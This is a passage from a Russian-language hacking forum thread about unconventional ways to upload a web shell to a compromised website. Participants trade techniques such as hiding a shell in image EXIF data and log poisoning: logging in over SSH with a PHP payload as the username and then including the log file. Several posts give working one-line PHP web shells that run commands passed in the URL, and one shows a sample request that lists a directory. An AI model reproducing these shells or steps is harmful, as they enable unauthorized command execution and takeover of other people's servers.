Авторские статьи Не стандартные способы заливки шелла

Discussion in 'Статьи' started by Osstudio, 11 Dec 2011.

  1. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    все таки не нашел:(
     
  2. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Попробуй так :)
     
  3. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    Всмысле мб имеет смысл добавить разжеванный вариант в 1й пост?
    Некоторые новички может быть в хроме\опере\ие работают и не знают о тампер дате в ФФ :)
    Я об этом говорил
     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    хе-хе

    по сабжу, если allow_url_fopen=off или PHP 4 < 4.3.0 надо замену file_get_contents
     
    #64 Strilo4ka, 16 Dec 2011
    Last edited: 16 Dec 2011
  5. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Как вариант, если включён Curl, естественно юзать его..
    Или ещё вроде можно юзать fopen() :)
     
  6. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    жЕвать
    я то понял, как так заливат еще давно, а вот новички то думаю не все сразу въедут
     
  7. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Всё пошагово расписано, если не поняли - то лучше на этом пути остановиться сейчас-же..
     
  8. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    А собственно где написано, что она прямо уж для новичков? :) Это для среднего юзверя, жаждущего познать информацию, у которого прямые клешни и т.п..
     
  9. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    хотелось бы увидеть про шелл в exif
     
  10. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Впринципе, можно сделать место функции chr(); как то так:
    $url=$_GET;$content= file_get_contents($url);...бы увидеть про шелл в exif[/QUOTE]Сделано ;)
     
    #70 Osstudio, 18 Jan 2012
    Last edited: 18 Jan 2012
    2 people like this.
  11. Machine

    Machine Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    403
    Likes Received:
    116
    Reputations:
    117
    За старания и поддержку статьи плюс.

    За орфографию минус.
     
  12. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Еще можно добавить к варианту |qbz|:
    1. Коннект по ssh,
    2. Попытки авторизоваться с именем <? $_GET['c']($_GET['a']); ?>
    3. Инклуд логов.
     
    _________________________
  13. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Собственно не понял, какое отношение к варианту qbz относится 1 и 2 :) Но добавлю.... только про 2 метод не понял, зачем нам это нужно, выполнение пхп кода в авторизации, это по-пойму немного бред (сорри) ;) или тут в чём то другом подвох?)

    З.Ы Постите методы, всё будет включено, соберём самый большой сборник, это будет неплохо, имхо!
     
    #73 Osstudio, 18 Jan 2012
    Last edited: 18 Jan 2012
  14. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    я думаю кибер-панк имел ввиду, то что их спообы похожы в том, что оба сохраняются в логах.
     
    1 person likes this.
  15. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    ну, логи входов сложно найти, это раз.
    А во-вторых, вот этот код:
    Code:
    <? $_GET['c']($_GET['a']); ?>
    Вызывает у меня большие подозрения, ведь он вызовет еррор? ладно бы eval() так нет, тут откуда то просто переменная из GET и следом ошибка синтаксиса, мы в итоге получим Fatal error: Function name must be a string, не более, имхо!
     
  16. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Code:
    # cat 2.php 
    <? $_GET['c']($_GET['a']); ?>
    
    2.php?c=system&a=ls

    У меня все работает.
     
    _________________________
    4 people like this.
  17. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    С eval-ом не прокатит.
     
  18. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    угу, тем более например у меня на локалке такой код не робит... пхп старый мб
     
  19. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Code:
    # php --version
    PHP 5.3.2-1ubuntu4.9 with Suhosin-Patch (cli) (built: May  3 2011 00:43:34) 
    
    Да, и лучше так:
    Code:
    <? @$_GET['c']($_GET['a']); ?>
    
     
    _________________________
  20. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    system то робит, а eval как же?)
    Так можно что то из серии <?exec($_GET['a'],$a);echo$a[0];?> сделать...
     
    #80 Osstudio, 26 Jan 2012
    Last edited: 26 Jan 2012